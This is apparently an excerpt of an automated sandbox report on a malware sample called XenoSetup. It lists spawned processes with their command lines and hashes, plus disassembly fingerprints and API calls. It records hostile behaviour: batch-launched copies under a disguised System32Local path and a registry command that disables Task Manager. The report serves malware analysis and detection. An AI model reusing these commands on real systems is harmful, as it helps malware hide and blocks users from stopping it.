Imagebase:	0x7ff64f2f0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	07:32:53
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	07:32:53
Start date:	13/01/2025
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6f1810000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	07:32:53
Start date:	13/01/2025
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff7a97b0000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	07:32:54
Start date:	13/01/2025
Path:	C:\portBrokerDll\DriverbrokerCrtDhcp.exe
Wow64 process (32bit):	false
Commandline:	C:\portBrokerDll\DriverbrokerCrtDhcp.exe
Imagebase:	0x210000
File size:	3'420'843 bytes
MD5 hash:	C9D8BCE0425ED81346B9A43F148D948B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	07:32:54
Start date:	13/01/2025
Path:	C:\portBrokerDll\DriverbrokerCrtDhcp.exe
Wow64 process (32bit):	false
Commandline:	C:\portBrokerDll\DriverbrokerCrtDhcp.exe
Imagebase:	0x820000
File size:	3'420'843 bytes
MD5 hash:	C9D8BCE0425ED81346B9A43F148D948B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	07:32:56
Start date:	13/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\portBrokerDll\Ac4k16M5JuZ3cBUzCeuZfRwt20LYrImECkDEo2qhe7JRV.bat" "
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 352, Parent PID: 4020

General

Target ID:	43
Start time:	07:32:57
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	07:32:57
Start date:	13/01/2025
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
Imagebase:	0xc70000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	07:32:57
Start date:	13/01/2025
Path:	C:\portBrokerDll\DriverbrokerCrtDhcp.exe
Wow64 process (32bit):	false
Commandline:	"C:\portBrokerDll/DriverbrokerCrtDhcp.exe"
Imagebase:	0x7d0000
File size:	3'420'843 bytes
MD5 hash:	C9D8BCE0425ED81346B9A43F148D948B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	07:33:02
Start date:	13/01/2025
Path:	C:\portBrokerDll\DriverbrokerCrtDhcp.exe
Wow64 process (32bit):	false
Commandline:	"C:\portBrokerDll\DriverbrokerCrtDhcp.exe"
Imagebase:	0xc80000
File size:	3'420'843 bytes
MD5 hash:	C9D8BCE0425ED81346B9A43F148D948B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	07:33:05
Start date:	13/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\portBrokerDll\Ac4k16M5JuZ3cBUzCeuZfRwt20LYrImECkDEo2qhe7JRV.bat" "
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: NZdXlPbVdUubKXQ.exePID: 1912, Parent PID: 4004

General

Target ID:	49
Start time:	07:33:05
Start date:	13/01/2025
Path:	C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe"
Imagebase:	0x420000
File size:	3'420'843 bytes
MD5 hash:	C9D8BCE0425ED81346B9A43F148D948B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	07:33:05
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	07:33:05
Start date:	13/01/2025
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
Imagebase:	0xc70000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	07:33:06
Start date:	13/01/2025
Path:	C:\portBrokerDll\DriverbrokerCrtDhcp.exe
Wow64 process (32bit):	false
Commandline:	"C:\portBrokerDll/DriverbrokerCrtDhcp.exe"
Imagebase:	0x7f0000
File size:	3'420'843 bytes
MD5 hash:	C9D8BCE0425ED81346B9A43F148D948B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 00007FFD348B0A21 Relevance: .5, Instructions: 515COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2354819212.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd348b0000_XenoSetup(2).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52bee924754f3e0551a6b18f375783e9f1262111865db3343487df3c19029624
Instruction ID: 0e6b6cfdd2ffda9d9efd9a871f8ba1ce6d52bcca42074bc2b9c0197afc6b20fc
Opcode Fuzzy Hash: 52bee924754f3e0551a6b18f375783e9f1262111865db3343487df3c19029624
Instruction Fuzzy Hash: 09F17430B1C91A8FDB98EB68C4A467D73E2FF56311B514639E91EC32D2CE78AC119780

Function 00007FFD348B05FA Relevance: 4.1, Strings: 3, Instructions: 316COMMON

Download Yara Rule

Strings

>M_^, xrefs: 00007FFD348B0601
M_^, xrefs: 00007FFD348B06C9
3CM_^, xrefs: 00007FFD348B08C0

Memory Dump Source

Source File: 00000000.00000002.2354819212.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd348b0000_XenoSetup(2).jbxd

Similarity

API ID:
String ID: >M_^$M_^$3CM_^
API String ID: 0-1644849703
Opcode ID: e0db6f851ad62c58b98ce5f9e69b2ebf1a367601fbf81bec5e77b6c6cdacfbaa
Instruction ID: 8381c0636a0c4b000131d3f9bf1283d452ee5fb6d0c060a9d647a05b8833ba03
Opcode Fuzzy Hash: e0db6f851ad62c58b98ce5f9e69b2ebf1a367601fbf81bec5e77b6c6cdacfbaa
Instruction Fuzzy Hash: 9D31EA13B0D3824FE666637C58B61E93BA09F93325F0841B7C288DA0D3ED5E284696D2

Function 00007FFD348B065D Relevance: 2.8, Strings: 2, Instructions: 302COMMON

Download Yara Rule

Strings

M_^, xrefs: 00007FFD348B06C9
3CM_^, xrefs: 00007FFD348B08C0

Memory Dump Source

Source File: 00000000.00000002.2354819212.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd348b0000_XenoSetup(2).jbxd

Similarity

API ID:
String ID: M_^$3CM_^
API String ID: 0-3398705814
Opcode ID: fd53fc9629656bec18eb36f12cb423ac132fb42bd5c6d9210134568f4afa5bca
Instruction ID: 7837e4b3bf7dd8b1db0d6bf1a2860a8d4e8885ceac83afe0feb717255fa1a140
Opcode Fuzzy Hash: fd53fc9629656bec18eb36f12cb423ac132fb42bd5c6d9210134568f4afa5bca
Instruction Fuzzy Hash: E931B852B0E7850FE76663B858B61E93BA0DF93315F0801F7C2C8DA0D3ED5E64469291

Function 00007FFD348B1B1E Relevance: 2.6, Strings: 2, Instructions: 109COMMON

Download Yara Rule

Strings

yz4, xrefs: 00007FFD348B1BCD
Xyz4, xrefs: 00007FFD348B1BA3

Memory Dump Source

Source File: 00000000.00000002.2354819212.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd348b0000_XenoSetup(2).jbxd

Similarity

API ID:
String ID: Xyz4$yz4
API String ID: 0-3381115999
Opcode ID: e746372006de1b20b9167b661f0eb0128204ef93e766c07abf2b6fdbe576e67b
Instruction ID: 305a1ada56d2425c42496b76911706ad088f8c14c718ffbd8555261357164e63
Opcode Fuzzy Hash: e746372006de1b20b9167b661f0eb0128204ef93e766c07abf2b6fdbe576e67b
Instruction Fuzzy Hash: 9F31C521A0D68E4FD782D7A888B51ED7FF1EF87220F4801BBD549EB293DD6C68068351

Function 00007FFD348B15BD Relevance: .5, Instructions: 531COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2354819212.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd348b0000_XenoSetup(2).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c22aa051c559d99e14d50c6a27866f9dca2d125d6b57ff4e9d2eb452cfab2a8
Instruction ID: 8c7339244a4c22bc89d74dadb30a5a307f970e7f16a961e4bbd005bc3bad6501
Opcode Fuzzy Hash: 5c22aa051c559d99e14d50c6a27866f9dca2d125d6b57ff4e9d2eb452cfab2a8
Instruction Fuzzy Hash: 61C12761B0CA854FE795DB6844B93B87BD2FFAA350F0801BAD44DC7293DD78A8459381

Function 00007FFD348B04A8 Relevance: .3, Instructions: 324COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2354819212.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd348b0000_XenoSetup(2).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 173a97a724d681238d49c7f53373da5c9f836b7e058d94eb6dd2776fca570c89
Instruction ID: 89b58bb970ded9c5046fcb0657775a296f2353b3fdd18c389b680c0243aba5a8
Opcode Fuzzy Hash: 173a97a724d681238d49c7f53373da5c9f836b7e058d94eb6dd2776fca570c89
Instruction Fuzzy Hash: D1A13921B1CA494FE798EB6C44A93B97BD2FFA9350F4801B9D44EC72D3DD78A8419381

Function 00007FFD348B11B9 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2354819212.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd348b0000_XenoSetup(2).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f679492da070416feb87b952c6babedc9d65a048b59f7b49e452e64b37c3134e
Instruction ID: fa807d4f73bee206360bf72126ab000d27268db05a8daac6f247c3c2fff77bed
Opcode Fuzzy Hash: f679492da070416feb87b952c6babedc9d65a048b59f7b49e452e64b37c3134e
Instruction Fuzzy Hash: D4219F35B289594FDBA9EBB884616F9B3D5FF95300F0445BAD00EC3297DE28A9058790

Function 00007FFD348B1C69 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2354819212.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd348b0000_XenoSetup(2).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b26d7e67486bbcc20d6fb2ad2be991668955394775d2a1461bde6ee25afa49b1
Instruction ID: 02442eca4098a0143e227c712d267806b4dfac0623a6f5d21bab5c765537d6d9
Opcode Fuzzy Hash: b26d7e67486bbcc20d6fb2ad2be991668955394775d2a1461bde6ee25afa49b1
Instruction Fuzzy Hash: 6821D631B19A5C4FD7A5BB7884A52E977A1FF8A305F4001BAD10EC7293DE2D9C418381

Function 00007FFD348B12A9 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2354819212.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd348b0000_XenoSetup(2).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67f99472494a777c70c371d679773b8b8a65489d275d52a92a8705608bca6b4b
Instruction ID: 2b23f94b69703fc1e705885b3195948273e0f44e3041d083cbad522d81c663c5
Opcode Fuzzy Hash: 67f99472494a777c70c371d679773b8b8a65489d275d52a92a8705608bca6b4b
Instruction Fuzzy Hash: 5B113612F4D9850FE7A4A3B828A61F57BC5DB96321B0501B6D44DC72D3DC0D68478391

Function 00007FFD348B04B0 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2354819212.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd348b0000_XenoSetup(2).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aee3051780b0a9e4f233a67e63dc0afdd7f1363a79cc6cc727199cf39649b8d5
Instruction ID: fcea0b6734a264eb2c40d64a12b72659af36684eaedf96445dfd19ca423f907e
Opcode Fuzzy Hash: aee3051780b0a9e4f233a67e63dc0afdd7f1363a79cc6cc727199cf39649b8d5
Instruction Fuzzy Hash: 17F0A412F198090BE7A4A6AD18A92B557C6EBA9361B40017AE50EC2296DC5D58429390

Function 00007FFD348B09E6 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2354819212.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd348b0000_XenoSetup(2).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fc6e1db4e1bfa1ff20755b7efe1387f65069bd318d49263f9cb79c06232fe99
Instruction ID: 7fd0cf97019e37f915d97d074dbfb98d175d5415352a33a88a4d821e60759a27
Opcode Fuzzy Hash: 2fc6e1db4e1bfa1ff20755b7efe1387f65069bd318d49263f9cb79c06232fe99
Instruction Fuzzy Hash: 1AE0CD10718D1547D798F66C5461DB973D1DB84354B480034F40CD7285CD2CAA8143C1

Analysis Process: powershell.exePID: 6400, Parent PID: 876COMMON

Executed Functions

Function 00007FFD34899EF3 Relevance: .2, Instructions: 249COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2330877459.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a73a70e9ad4ef561402dc41440588857c2f5ca3bd2e72da25838d2b399a5dea
Instruction ID: 048e4b2a9806ea3e9f26c4b137e9f401c83007ee583abc5228aef1f7d964995b
Opcode Fuzzy Hash: 5a73a70e9ad4ef561402dc41440588857c2f5ca3bd2e72da25838d2b399a5dea
Instruction Fuzzy Hash: C1710C67B0CE965BE711A76C9CB60DA7FE0EF13328B0D01B2C698CB053ED1D24179686

Function 00007FFD3489644D Relevance: .7, Instructions: 707COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2330877459.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d64f1e2318e4a679313b1ed38844097b2692f5a9bfe5dd18b729018ef9b5f97
Instruction ID: 469dd1610623d55de20e2c97b090520eb55472bbade319efa11ea0041850aa7d
Opcode Fuzzy Hash: 2d64f1e2318e4a679313b1ed38844097b2692f5a9bfe5dd18b729018ef9b5f97
Instruction Fuzzy Hash: 26D17031A18A4D8FDF95DF5CC4A5AE97BE1FF69300F14416AD40DE72A6CA34E881CB81

Function 00007FFD34964073 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2335383940.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd34960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c59e708ad63793eea274f61f0fda813f0c4e3f65c25b6a084af1e8f7d7ce6294
Instruction ID: ad84f9a8dc5a6dfc2cf9cba346ce0651eff39311b3cfc6192771d81e3ac6fd3c
Opcode Fuzzy Hash: c59e708ad63793eea274f61f0fda813f0c4e3f65c25b6a084af1e8f7d7ce6294
Instruction Fuzzy Hash: 57515432B0CA968FEBA99A9C44B057437D2EFA2230B1900BFC24DC7197DE2CEC058755

Function 00007FFD34964370 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2335383940.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd34960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 834160aea9c8c3c0a7dd77e213251ec3e8ac2b16c18a3eab6627b7ec221124ad
Instruction ID: 7611f9c545e6c7b8af415edfc30230694942b1242ee081149931d278c65b892f
Opcode Fuzzy Hash: 834160aea9c8c3c0a7dd77e213251ec3e8ac2b16c18a3eab6627b7ec221124ad
Instruction Fuzzy Hash: BA412632B0DA898FEBA9D6AC54A19B477D1EF46234B0800BFD54DC7197E91CBC048395

Function 00007FFD3477E620 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2327267738.00007FFD3477D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3477D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd3477d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c1b19f8518caa2ef92761a7d3ee81f8b51d10569fae5ef97887e9568eafd016
Instruction ID: 4dad2e9feca7764a5457194dc3a786c5beee2842d9754c0d39ecdfcbe0358b83
Opcode Fuzzy Hash: 8c1b19f8518caa2ef92761a7d3ee81f8b51d10569fae5ef97887e9568eafd016
Instruction Fuzzy Hash: 364126B180DBC48FE7568B289C959623FF0EF53320B1945DFD088CB0A3D629B845C7A2

Function 00007FFD3489978B Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2330877459.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55385a3b6207283d6551fde58d512b3eb2e05f22598bf40dc6ee2216964d976f
Instruction ID: 026804f15fa3227bcde5e230b5dea7e81a1204c719c63fc3374ecb092a58a51e
Opcode Fuzzy Hash: 55385a3b6207283d6551fde58d512b3eb2e05f22598bf40dc6ee2216964d976f
Instruction Fuzzy Hash: 8F31873191CF4C9FDB58DF5C98466A97BE0FB99311F00422FE449D3251DB71A8558BC2

Function 00007FFD3489A47C Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2330877459.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 936e6af6203c4933bf03ac22c2757c492f92679a07c5f6f919c951c4318521a4
Instruction ID: d817b5bed3aca4205ce7cb934a3af39acf6b2aa796c37093728c166f0c9a8b75
Opcode Fuzzy Hash: 936e6af6203c4933bf03ac22c2757c492f92679a07c5f6f919c951c4318521a4
Instruction Fuzzy Hash: 90210A3190CB4C4FDB59DFAC988A7E97FF0EB96321F04416BD448C3152DA74A41ACB91

Function 00007FFD349640BF Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2335383940.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd34960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3c53c7db6b4af904c31e86cda3a9aa5e1aa079894e44920b17342084db76503
Instruction ID: 3a952a61cf3550ae62acea75ba87e3380824cc1cce7ad291c3f898959666b998
Opcode Fuzzy Hash: a3c53c7db6b4af904c31e86cda3a9aa5e1aa079894e44920b17342084db76503
Instruction Fuzzy Hash: AF21F732B0DA968FE7A5DB9C44B057466C2EF62234B4A00BED14DC71A7CD2CEC049719

Function 00007FFD349643BC Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2335383940.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd34960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c63313a925358de9643e322fedf074a5058cc00f5bdaea381c6fb67b4667dd42
Instruction ID: f2bd8e02b3ba02cdaa3327900867d1528ed8b03a28f96eb2f95ede5648238578
Opcode Fuzzy Hash: c63313a925358de9643e322fedf074a5058cc00f5bdaea381c6fb67b4667dd42
Instruction Fuzzy Hash: 1211E032A0E5858FEBA5D79C94B59B87BD1EF0223474800FED55DCB09ACA1DBC049365

Function 00007FFD3496681E Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2335383940.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd34960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a05b7a00fc2021c5696182fc72d81821fc379f4df11dcfbdbb86aa69ffac685b
Instruction ID: 0de7bee3e9bacdfffbef96bdcb6dcabfe16ab017922f029d77c6db9690b12ca3
Opcode Fuzzy Hash: a05b7a00fc2021c5696182fc72d81821fc379f4df11dcfbdbb86aa69ffac685b
Instruction Fuzzy Hash: 1B11E372B0DA888FEB95DAA890E41A87B91EF56220B0440BEC54CD7097DA2DAC45C360

Function 00007FFD348933B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2330877459.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction ID: ae605e7e7b896741c28386b595f310dc01aebb4b8afea9650844b96dbb4c98a5
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction Fuzzy Hash: A401A73020CB0C4FD744EF0CE451AA6B7E0FB89320F10052DE58AC3651DA36E882CB41

Non-executed Functions

Function 00007FFD34898BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

Strings

N_^F, xrefs: 00007FFD34898C7A
N_^4, xrefs: 00007FFD34898BFA
N_^7, xrefs: 00007FFD34898C12
N_^J, xrefs: 00007FFD34898C8A

Memory Dump Source

Source File: 00000002.00000002.2330877459.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID: N_^4$N_^7$N_^F$N_^J
API String ID: 0-3508309026
Opcode ID: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
Instruction ID: 3b76da1c841fbdb11da6a3614379ab6690a2d8885d252c0cc13f4bf58231014a
Opcode Fuzzy Hash: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
Instruction Fuzzy Hash: D32101B7B084266FD3127BFCAD346DA3B54DB9433474902B2D298DB143E934708A8AC2

Analysis Process: XenoSetup(1).exePID: 1476, Parent PID: 876COMMON

Execution Graph

Execution Coverage:	9.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	5.1%
Total number of Nodes:	1515
Total number of Limit Nodes:	30

Executed Functions

Function 00FFDF1E Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 195
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00FF0863: GetModuleHandleW.KERNEL32(kernel32), ref: 00FF087C
Part of subcall function 00FF0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00FF088E
Part of subcall function 00FF0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00FF08BF

Part of subcall function 00FFA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00FFA655

Part of subcall function 00FFAC16: OleInitialize.OLE32(00000000), ref: 00FFAC2F
Part of subcall function 00FFAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00FFAC66
Part of subcall function 00FFAC16: SHGetMalloc.SHELL32(01028438), ref: 00FFAC70

GetCommandLineW.KERNEL32 ref: 00FFDF5C
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00FFDF83
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00FFDF94
UnmapViewOfFile.KERNEL32(00000000), ref: 00FFDFCE

Part of subcall function 00FFDBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00FFDBF4
Part of subcall function 00FFDBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00FFDC30

CloseHandle.KERNEL32(00000000), ref: 00FFDFD7
GetModuleFileNameW.KERNEL32(00000000,0103EC90,00000800), ref: 00FFDFF2
SetEnvironmentVariableW.KERNEL32(sfxname,0103EC90), ref: 00FFDFFE
GetLocalTime.KERNEL32(?), ref: 00FFE009
_swprintf.LIBCMT ref: 00FFE048
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00FFE05A
GetModuleHandleW.KERNEL32(00000000), ref: 00FFE061
LoadIconW.USER32(00000000,00000064), ref: 00FFE078
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00FFE0C9
Sleep.KERNEL32(?), ref: 00FFE0F7
DeleteObject.GDI32 ref: 00FFE130
DeleteObject.GDI32(?), ref: 00FFE140
CloseHandle.KERNEL32 ref: 00FFE183

Strings

STARTDLG, xrefs: 00FFE0BE
winrarsfxmappingfile.tmp, xrefs: 00FFDF77
sfxstime, xrefs: 00FFE055
